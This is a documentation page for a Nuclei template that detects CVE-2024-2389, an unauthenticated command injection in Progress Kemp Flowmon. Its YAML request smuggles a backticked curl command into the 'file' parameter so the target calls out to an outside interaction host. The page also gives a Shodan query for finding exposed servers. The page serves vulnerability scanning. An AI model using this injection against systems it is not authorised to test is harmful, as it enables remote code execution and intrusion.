Skip to content
Nuclei Templates

Progress Kemp Flowmon - Command Injection

ID: CVE-2024-2389

Severity: critical

Author: pdresearch,parthmalhotra

Tags: cve,cve2024,progress,rce,flowmon

Description

Section titled “Description”

In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.

YAML Source

Section titled “YAML Source”
id: CVE-2024-2389


info:
  name: Progress Kemp Flowmon - Command Injection
  author: pdresearch,parthmalhotra
  severity: critical
  description: |
    In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.
  reference:
    - https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
    - https://www.flowmon.com
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1777977522140950640
    - https://github.com/adhikara13/CVE-2024-2389
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-2389
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.08267
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'Server: Flowmon'
  tags: cve,cve2024,progress,rce,flowmon


http:
  - method: GET
    path:
      - "{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"


    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains(header, 'application/json') && contains(header, 'Flowmon')
        condition: and
# digest: 4a0a004730450221009154f9cb86ce25a0b04c1bc763de60f56de9f72ffa4405de24e534b20bb926bd02200f53904f050a95cb0e8d12c4d79e70320c34b0afd31d4a30877ead7e63e6317c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-2389.yaml"

View on Github